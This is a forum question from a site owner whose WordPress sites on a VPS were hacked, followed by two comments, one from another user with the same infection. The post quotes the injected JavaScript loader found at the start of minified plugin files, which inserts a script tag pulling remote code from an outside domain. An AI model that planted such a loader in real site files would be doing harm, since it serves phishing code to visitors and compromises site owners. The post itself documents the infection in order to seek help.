# WordPress site hacked

Tags: malware, virus, phishing, wordpress

We got hacked.

**Our setup:**
DigitalOcean VPS, Apache, multiple domains & WP websites, Elementor Pro, hopefully safe plugins.

**Known facts:**

- It's phishing.
- The virus infects all the websites on our VPS.
- They like to play hide'n'seek. It randomly injects client files *(mostly minified plugin files)* with random code. (On one site it's jquery-migrate.min.js, on another site it's elementor-pro... just random)

This is the code injected right at the start of a compromised file:

```
;(function(b, r, f, c, m, j) {
    m = r.createElement(f);
    j = r.getElementsByTagName(f)[0];
    m.async = 1;
    m.src = c;
    j.parentNode.insertBefore(m, j);
}
)(window, document, 'script', 'https://trademark.iglesiaelarca.com/OM34nkPvm/dc78KsD/rUvErvwrxWv5LuVK+ZvEU=');
```

Anyone experienced this kind of exploitation?

Will inform you about more findings.

Comment: It is not likely that  iglesiaelarca.com is the originator but it is likely that they are a victim, just like you. What is your question?

Comment: Hi @Ni Amon, I have this same exact issue on a WP Site hosted on WP Engine. Around the time your question was posted was when we discovered the issue. We thought it may have been an outdated, compromised WP Plugin, but since updating the plugins, we still find this same snippet of code added to our site at random, most of the time to minified files. We are also looking for information on what the issue is or if anyone else has an issue. Is this an issue that needs to be brought up to the web hosts? i.e. WP Engine or Digital Ocean in your case?